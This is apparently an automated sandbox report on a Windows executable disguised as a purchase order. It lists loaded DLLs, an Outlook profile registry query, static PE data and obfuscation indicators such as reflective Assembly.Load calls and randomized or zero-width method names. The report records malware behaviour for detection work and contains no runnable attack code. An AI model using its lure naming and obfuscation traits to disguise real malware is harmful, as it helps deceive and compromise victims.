                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Purchase Order 007823-PO# 005307.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Purchase Order 007823-PO# 005307.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Purchase Order 007823-PO# 005307.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: XpkT.pdb source: Purchase Order 007823-PO# 005307.exe
                  Source: Binary string: XpkT.pdbSHA256h! source: Purchase Order 007823-PO# 005307.exe

                  Data Obfuscation

                  barindex
                  Source: Purchase Order 007823-PO# 005307.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.3631ea0.0.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, WqcMW7fGuvAyFrWZNB.cs.Net Code: Khx74Nwcom System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.7320000.6.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.3619c80.3.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, WqcMW7fGuvAyFrWZNB.cs.Net Code: Khx74Nwcom System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, WqcMW7fGuvAyFrWZNB.cs.Net Code: Khx74Nwcom System.Reflection.Assembly.Load(byte[])
                  Source: Purchase Order 007823-PO# 005307.exeStatic PE information: 0xBFC6CF92 [Wed Dec 16 07:45:22 2071 UTC]
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 0_2_066D965D push FFFFFF8Bh; iretd 0_2_066D965F
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 0_2_066D0EC8 pushad ; iretd 0_2_066D0EC9
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 0_2_066D7C60 push 84066ECBh; retf 0_2_066D7C69
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 0_2_066D1972 push es; retf 0_2_066D1988
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_0296891E pushad ; iretd 6_2_0296891F
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_02968C2F pushfd ; iretd 6_2_02968C30
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_02968DDF push esp; iretd 6_2_02968DE0
                  Source: Purchase Order 007823-PO# 005307.exeStatic PE information: section name: .text entropy: 7.742206818544972
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, RuBRpjsmQGSktTD3uU.csHigh entropy of concatenated method names: 'rrY4OMbRg', 'Sd9lqJEJo', 'TINNCtZNA', 'zhhmsHyuy', 'BYfVosS5t', 'aFanYW5e7', 'NInBKgpagerVWx7bjo', 'YZjN8IMuIAAicIAFb2', 'vKb6CCeVA', 'sbHaHqY7R'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, KlDYvuPcJ4ZXDLlD2t.csHigh entropy of concatenated method names: 'WfHTHwXPJM', 'AQMTDYuWhh', 'pFuTBNg3gb', 'o9uBjuTvo7', 'C6qBznSAKw', 'FvPTetAWCM', 'LLUTha42vF', 'TQgTsCgY1W', 'xLcTZ86bK8', 'RLxT70nYoV'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, H48JFYq2tdnsnGG75c.csHigh entropy of concatenated method names: 'uKt1IfjhdZ', 'tfJ1V8Md6R', 'cL21SbNCKe', 'VU91Oj37QJ', 'a1x12b1eOE', 'Wa01MJYIFE', 'Ipc1PkXPU0', 'NQu1vRfDwA', 'zoR15u42Pb', 'kUH1KdmSFq'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, uuVRExIJeZcn6YBP0r.csHigh entropy of concatenated method names: 'eE8gXOKDwQ', 'durg8mRLfi', 'oo3gYX5Gge', 'nLOgpSsvnZ', 'JFpgcA61di', 'fapgWvqgFW', 'vc8gyvMEse', 'GCmgRpqJdd', 'yATgiZo7rb', 'UFegjU9PUH'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, b2nk8xnoNtknNlXL4j.csHigh entropy of concatenated method names: 'Bx2oA5oKce', 'GZ3omGlXvj', 'CDoD0JH2HA', 'WNcD2uYIK6', 'VWWDMG2FIL', 'oZ8DLplkNk', 'smeDP7t9c6', 'LyXDvhow1w', 'zW8Du0EWTV', 'v8nD5GveZD'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, EAITTaDa7fhQTL9u84.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'w6JsiXCudU', 'vkhsjoVuck', 'LxlszaoAO8', 'FSgZeTEMCG', 'XDBZhZH1y4', 'kHBZsa0Dij', 'YXVZZri3tV', 'vpDdN9cVVk9tnC40KGt'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, p3ZODThZKAsx5ayVEbv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h0SaXnvvWG', 'croa85yXTw', 'bYXaYNTPhb', 'T2iapYFRZk', 'xE2acOqXFb', 'm42aWXxSTv', 'CfRayeS1VR'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, hSbyLT792GkOJwvO67.csHigh entropy of concatenated method names: 'RYJhTuVREx', 'ueZhfcn6YB', 'i3ZhdrJYns', 'es8hxxs2nk', 'AXLhU4jGKQ', 'q3ghGnW8KS', 'ztBRY0dMOukhSVWrXZ', 'uZgXQgrRryfEWfnOYJ', 'Br0hhFHKR7', 'YI1hZFynme'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, aDNJxoV3ZrJYnsCs8x.csHigh entropy of concatenated method names: 'HNPDllJ11J', 's40DNnrMLa', 'YAwDIjGW6l', 'dgSDVDacoO', 'vwXDUYxxka', 'ksnDGwInxi', 'Qd5DttQtEr', 'N7qD6AhmOd', 'NbODFpfpGt', 'v4oDaCZfUh'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, iadXmCzC34PNtLgm7M.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lehF1r1v43', 'k9CFUqp7wM', 'j83FGuvgsN', 'aeVFt35HTE', 'kQqF6o2gKT', 'w19FFVWwjK', 'zAcFaF9wyU'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, tlRSVVuDgsKA0CXT0o.csHigh entropy of concatenated method names: 'dxfTQ7DVR3', 'QwpTbBtdY2', 'GKUT4sifiD', 'WDvTlElOQp', 'lpsTAG2Ow6', 'V1xTNaOpjj', 'VAHTmHAluf', 'TSMTIs0yTi', 'kLPTVnlfgN', 'MXPTnWucb4'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, qs6X13jo79liA4qpRG.csHigh entropy of concatenated method names: 'TftFhYiHEG', 'mmxFZVwBCZ', 'YGbF7fAKHn', 'um0FHDvTkD', 'DSSFgn3bsx', 'acTFo9HlMJ', 'GceFBk8IxU', 'Xdy6y9tLAp', 'w9p6Ret9uW', 'xt46iPSobr'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, QoIkhhYbTSMGuR8INc.csHigh entropy of concatenated method names: 'ToString', 'ghEGKc2iJL', 'QtbGOQB8Bn', 'XUiG0jXCZB', 'oIOG2DnyyS', 'oTjGMvRWqD', 'bVeGLjVVwW', 'bNdGPRPQ9q', 'IaBGvMHTOk', 'hU6GuNivU5'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, rHfq9Rhe45v49FJHf5F.csHigh entropy of concatenated method names: 'YNiFQ37Uj4', 'K2WFbDZRNH', 'bKWF4RPcOh', 'MGYFlIW9oE', 'aTTFADQ3BW', 'fY4FN4LLVI', 'h0fFmTXPr4', 'cHPFIDd1ky', 'WXiFV4mr7C', 'FeQFnWqX1d'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, l1j8iaRP3RQoLWVUbU.csHigh entropy of concatenated method names: 'dUf6HEmnfr', 'hia6g1yZPg', 'aMp6DbH2l2', 'qWp6oiDlYk', 'a5j6BlLGgV', 'FGN6TCshJh', 'm7U6fACakK', 'FxZ6ra9LYg', 'fFA6d0quOF', 'IcN6x8FQxc'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, pKQ63gSnW8KStsUOvB.csHigh entropy of concatenated method names: 'l22BCR00Ri', 'PSdBgTUO8J', 'VlmBoeaKOg', 'JJcBTp86Dt', 'kcuBfllAqS', 'VDeocupURc', 'D4HoWhtcxi', 'DCZoy7C5DY', 'OVKoRoYMIt', 'rv5oi7WHTq'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, suXuY2gFs2qKcgS69B.csHigh entropy of concatenated method names: 'Dispose', 'b6xhig8v4d', 'KNqsOI5GaJ', 'CXGllrJcW1', 'Bd1hjj8iaP', 'PRQhzoLWVU', 'ProcessDialogKey', 'yUZseSTvmA', 'LhashfFqgq', 'Iwass6s6X1'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, cSTvmAiPhafFqgq0wa.csHigh entropy of concatenated method names: 'MFC6S6ZRM7', 'pdS6OabSjA', 'S4560WheQm', 'J9j62P12C4', 'p1e6Xhx522', 'wNo6MsmbG3', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, b9bGJTX07refrtngyX.csHigh entropy of concatenated method names: 'KvsU5iP3Tj', 'aXvU36eZB5', 'MnHUXVKQML', 'j9MU8XUGyC', 'U3sUOjDgJS', 'cxHU0nq8ke', 'wk0U2i2pMa', 'vDVUMadG7b', 'zl6ULtB7J6', 'sHNUPnrkNv'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, WqcMW7fGuvAyFrWZNB.csHigh entropy of concatenated method names: 'zGeZCMVSQ3', 'H1AZHxSSwi', 'ufVZgZ4SlZ', 'vWlZDckeGE', 'IqkZomCyAJ', 'wDLZBGHYsp', 'Kr7ZTMQior', 'ym2Zfpc94j', 'YyLZriHeeU', 'zctZdmJiim'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, RuBRpjsmQGSktTD3uU.csHigh entropy of concatenated method names: 'rrY4OMbRg', 'Sd9lqJEJo', 'TINNCtZNA', 'zhhmsHyuy', 'BYfVosS5t', 'aFanYW5e7', 'NInBKgpagerVWx7bjo', 'YZjN8IMuIAAicIAFb2', 'vKb6CCeVA', 'sbHaHqY7R'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, KlDYvuPcJ4ZXDLlD2t.csHigh entropy of concatenated method names: 'WfHTHwXPJM', 'AQMTDYuWhh', 'pFuTBNg3gb', 'o9uBjuTvo7', 'C6qBznSAKw', 'FvPTetAWCM', 'LLUTha42vF', 'TQgTsCgY1W', 'xLcTZ86bK8', 'RLxT70nYoV'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, H48JFYq2tdnsnGG75c.csHigh entropy of concatenated method names: 'uKt1IfjhdZ', 'tfJ1V8Md6R', 'cL21SbNCKe', 'VU91Oj37QJ', 'a1x12b1eOE', 'Wa01MJYIFE', 'Ipc1PkXPU0', 'NQu1vRfDwA', 'zoR15u42Pb', 'kUH1KdmSFq'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, uuVRExIJeZcn6YBP0r.csHigh entropy of concatenated method names: 'eE8gXOKDwQ', 'durg8mRLfi', 'oo3gYX5Gge', 'nLOgpSsvnZ', 'JFpgcA61di', 'fapgWvqgFW', 'vc8gyvMEse', 'GCmgRpqJdd', 'yATgiZo7rb', 'UFegjU9PUH'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, b2nk8xnoNtknNlXL4j.csHigh entropy of concatenated method names: 'Bx2oA5oKce', 'GZ3omGlXvj', 'CDoD0JH2HA', 'WNcD2uYIK6', 'VWWDMG2FIL', 'oZ8DLplkNk', 'smeDP7t9c6', 'LyXDvhow1w', 'zW8Du0EWTV', 'v8nD5GveZD'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, EAITTaDa7fhQTL9u84.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'w6JsiXCudU', 'vkhsjoVuck', 'LxlszaoAO8', 'FSgZeTEMCG', 'XDBZhZH1y4', 'kHBZsa0Dij', 'YXVZZri3tV', 'vpDdN9cVVk9tnC40KGt'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, p3ZODThZKAsx5ayVEbv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h0SaXnvvWG', 'croa85yXTw', 'bYXaYNTPhb', 'T2iapYFRZk', 'xE2acOqXFb', 'm42aWXxSTv', 'CfRayeS1VR'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, hSbyLT792GkOJwvO67.csHigh entropy of concatenated method names: 'RYJhTuVREx', 'ueZhfcn6YB', 'i3ZhdrJYns', 'es8hxxs2nk', 'AXLhU4jGKQ', 'q3ghGnW8KS', 'ztBRY0dMOukhSVWrXZ', 'uZgXQgrRryfEWfnOYJ', 'Br0hhFHKR7', 'YI1hZFynme'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, aDNJxoV3ZrJYnsCs8x.csHigh entropy of concatenated method names: 'HNPDllJ11J', 's40DNnrMLa', 'YAwDIjGW6l', 'dgSDVDacoO', 'vwXDUYxxka', 'ksnDGwInxi', 'Qd5DttQtEr', 'N7qD6AhmOd', 'NbODFpfpGt', 'v4oDaCZfUh'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, iadXmCzC34PNtLgm7M.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lehF1r1v43', 'k9CFUqp7wM', 'j83FGuvgsN', 'aeVFt35HTE', 'kQqF6o2gKT', 'w19FFVWwjK', 'zAcFaF9wyU'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, tlRSVVuDgsKA0CXT0o.csHigh entropy of concatenated method names: 'dxfTQ7DVR3', 'QwpTbBtdY2', 'GKUT4sifiD', 'WDvTlElOQp', 'lpsTAG2Ow6', 'V1xTNaOpjj', 'VAHTmHAluf', 'TSMTIs0yTi', 'kLPTVnlfgN', 'MXPTnWucb4'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, qs6X13jo79liA4qpRG.csHigh entropy of concatenated method names: 'TftFhYiHEG', 'mmxFZVwBCZ', 'YGbF7fAKHn', 'um0FHDvTkD', 'DSSFgn3bsx', 'acTFo9HlMJ', 'GceFBk8IxU', 'Xdy6y9tLAp', 'w9p6Ret9uW', 'xt46iPSobr'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, QoIkhhYbTSMGuR8INc.csHigh entropy of concatenated method names: 'ToString', 'ghEGKc2iJL', 'QtbGOQB8Bn', 'XUiG0jXCZB', 'oIOG2DnyyS', 'oTjGMvRWqD', 'bVeGLjVVwW', 'bNdGPRPQ9q', 'IaBGvMHTOk', 'hU6GuNivU5'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, rHfq9Rhe45v49FJHf5F.csHigh entropy of concatenated method names: 'YNiFQ37Uj4', 'K2WFbDZRNH', 'bKWF4RPcOh', 'MGYFlIW9oE', 'aTTFADQ3BW', 'fY4FN4LLVI', 'h0fFmTXPr4', 'cHPFIDd1ky', 'WXiFV4mr7C', 'FeQFnWqX1d'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, l1j8iaRP3RQoLWVUbU.csHigh entropy of concatenated method names: 'dUf6HEmnfr', 'hia6g1yZPg', 'aMp6DbH2l2', 'qWp6oiDlYk', 'a5j6BlLGgV', 'FGN6TCshJh', 'm7U6fACakK', 'FxZ6ra9LYg', 'fFA6d0quOF', 'IcN6x8FQxc'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, pKQ63gSnW8KStsUOvB.csHigh entropy of concatenated method names: 'l22BCR00Ri', 'PSdBgTUO8J', 'VlmBoeaKOg', 'JJcBTp86Dt', 'kcuBfllAqS', 'VDeocupURc', 'D4HoWhtcxi', 'DCZoy7C5DY', 'OVKoRoYMIt', 'rv5oi7WHTq'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, suXuY2gFs2qKcgS69B.csHigh entropy of concatenated method names: 'Dispose', 'b6xhig8v4d', 'KNqsOI5GaJ', 'CXGllrJcW1', 'Bd1hjj8iaP', 'PRQhzoLWVU', 'ProcessDialogKey', 'yUZseSTvmA', 'LhashfFqgq', 'Iwass6s6X1'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, cSTvmAiPhafFqgq0wa.csHigh entropy of concatenated method names: 'MFC6S6ZRM7', 'pdS6OabSjA', 'S4560WheQm', 'J9j62P12C4', 'p1e6Xhx522', 'wNo6MsmbG3', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, b9bGJTX07refrtngyX.csHigh entropy of concatenated method names: 'KvsU5iP3Tj', 'aXvU36eZB5', 'MnHUXVKQML', 'j9MU8XUGyC', 'U3sUOjDgJS', 'cxHU0nq8ke', 'wk0U2i2pMa', 'vDVUMadG7b', 'zl6ULtB7J6', 'sHNUPnrkNv'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, WqcMW7fGuvAyFrWZNB.csHigh entropy of concatenated method names: 'zGeZCMVSQ3', 'H1AZHxSSwi', 'ufVZgZ4SlZ', 'vWlZDckeGE', 'IqkZomCyAJ', 'wDLZBGHYsp', 'Kr7ZTMQior', 'ym2Zfpc94j', 'YyLZriHeeU', 'zctZdmJiim'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, RuBRpjsmQGSktTD3uU.csHigh entropy of concatenated method names: 'rrY4OMbRg', 'Sd9lqJEJo', 'TINNCtZNA', 'zhhmsHyuy', 'BYfVosS5t', 'aFanYW5e7', 'NInBKgpagerVWx7bjo', 'YZjN8IMuIAAicIAFb2', 'vKb6CCeVA', 'sbHaHqY7R'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, KlDYvuPcJ4ZXDLlD2t.csHigh entropy of concatenated method names: 'WfHTHwXPJM', 'AQMTDYuWhh', 'pFuTBNg3gb', 'o9uBjuTvo7', 'C6qBznSAKw', 'FvPTetAWCM', 'LLUTha42vF', 'TQgTsCgY1W', 'xLcTZ86bK8', 'RLxT70nYoV'
